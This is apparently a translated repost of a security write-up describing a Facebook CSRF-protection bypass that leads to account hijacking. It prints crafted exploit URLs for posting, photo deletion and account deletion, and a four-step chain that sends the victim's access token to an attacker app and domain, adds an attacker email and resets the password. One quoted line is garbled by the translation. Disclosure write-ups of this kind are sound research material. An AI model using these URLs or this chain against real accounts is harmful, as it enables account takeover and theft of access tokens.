Shulou(Shulou.com)05/31 Report--

This article shows you how to bypass the Facebook CSRF protection mechanism to achieve account hijacking, the content is concise and easy to understand, it will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

The vulnerability shared today is bypassed by Facebook's CSRF protection mechanism, which allows attackers to send requests with CSRF token to any server user of Facebook products to achieve account hijacking. In some scenarios, attackers may construct malicious URL to tempt victim users to click URL to trigger vulnerabilities to achieve effective Facebook account hijacking purposes.

Vulnerability description

The Facebook feature servers that I found to have vulnerabilities are:

Https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX

Where XXXX can be constructed to initiate a POST request to the server, and the Facebook interface with parameters, CSRF defense token-fb_dtsg will be automatically generated by Facebook and added to the request content.

For the attacker, it is entirely possible to construct a URL to convince the victim to click on the trigger vulnerability, because other Facebook functional service interfaces can be called in the vulnerable server, and can include request parameters and Anti-CSRF token-fb_dtsg, and finally realize the POST request to the server.

Using the above vulnerability server, after construction, as long as the target victim clicks to visit the constructed URL, the attacker can achieve a variety of operations. For example:

Do timeline (timeline) posting: https://www.facebook.com/comet/dialog_DONOTUSE/?url=/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT", "ranges": []} Delete profile Photo: https://www.facebook.com/comet/dialog_DONOTUSE/?url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID} changed the language parameter "locale" to deceive the victim to delete his own account: https://www.facebook.com/comet/dialog_DONOTUSE/? Url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR

This operation will pop up a password input confirmation box, as long as the victim enters the password is confirmed, his own account will be deleted.

Analysis on the possibility of account hijacking

To achieve account hijacking, we need to add a new email address or mobile number to the victim's account. But the problem here is that the victim needs to access two separate URL, one to add a mailbox or mobile phone number, and one to confirm the operation. Since the "normal" server used to add mailboxes or mobile phone numbers does not have a "next" parameter to jump to the user after the addition is successful, in order to solve this problem, I need to find a server with the "next" parameter, so that I can use a URL to hijack the account.

Step 1: require authorization to verify the attacker's app application, which will be redirected to https://www.facebook.com/v3.2/dialog/oauth in the process, and then automatically jump to the web content or website constructed by the attacker with the access_token parameter. Access_token has some ranges that the app application is allowed to access, and because / ajax/appcenter/redirect_to_app has been authorized, there can be no user interaction here.

Send this built URL link to the target victim user:

Https://www.facebook.com/comet/dialog_DONOTUSE/?url=/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog

This step is used in several processes:

First, use the / v3.2/dialog/oauth endpoint to bypass the redirect protection of Facebook in the "next" parameter. Even if Facebook has linkshim malicious jump protection, the purpose of adding the "next" parameter to the request is to block some malicious redirect attempts.

Second, each victim is identified using the received token, which will help to extract the confirmation code corresponding to the specific user later.

Step 2: the attacker's website receives the victim's visit to token, and then creates a mailbox in the page and redirects the victim to the following link:

Https://www.facebook.com/comet/dialog_DONOTUSE/?url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK]

The link completes the following actions:

First, it uses the / add_contactpoint/dialog/submit/ function to generate an attacker-controlled mailbox for the victim's account (no password confirmation is required in the process), and then it jumps to the interface selected by the attacker in the "next" parameter, as follows:

"/ v3.2According dialogandthoauthentic responsibilitytypeexamples tokenfolk clientclientprincipid= {ATTACKER_APP} & redirect_uri= {ATTACKER_DOMAIN}"

In this way, the victim's access request will include an access_token jump to "ATTACKER_DOMAIN".

Step 3: after receiving the "access_token" on the attacker's website, extract the victim user ID, and then look in the mailbox for the link added to the confirmation mailbox like the following Facebook, where CODE and HASH are generated by Facebook.

For an attacker, this method is very simple, but if you want to jump the victim to https://www.facebook.com/settings?section=email to add the mailbox, you need the / confirm_code/dialog/submit/ function to confirm that it contains a "next" parameter, which automatically redirects the victim to the Facebook home page after confirmation.

Step 4: now that a new mailbox has been added to the victim's account, the attacker can reset the password to hijack the account.

The above verification process is lengthy, but the attack process is instantaneous, which is very dangerous. The vulnerability may not be aimed at specific users, as long as any Facebook user who visits the first step to construct the link may be caught, as long as the specific execution script is deployed on the attacker-hosted website.

The above content is how to bypass the Facebook CSRF protection mechanism to achieve account hijacking. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.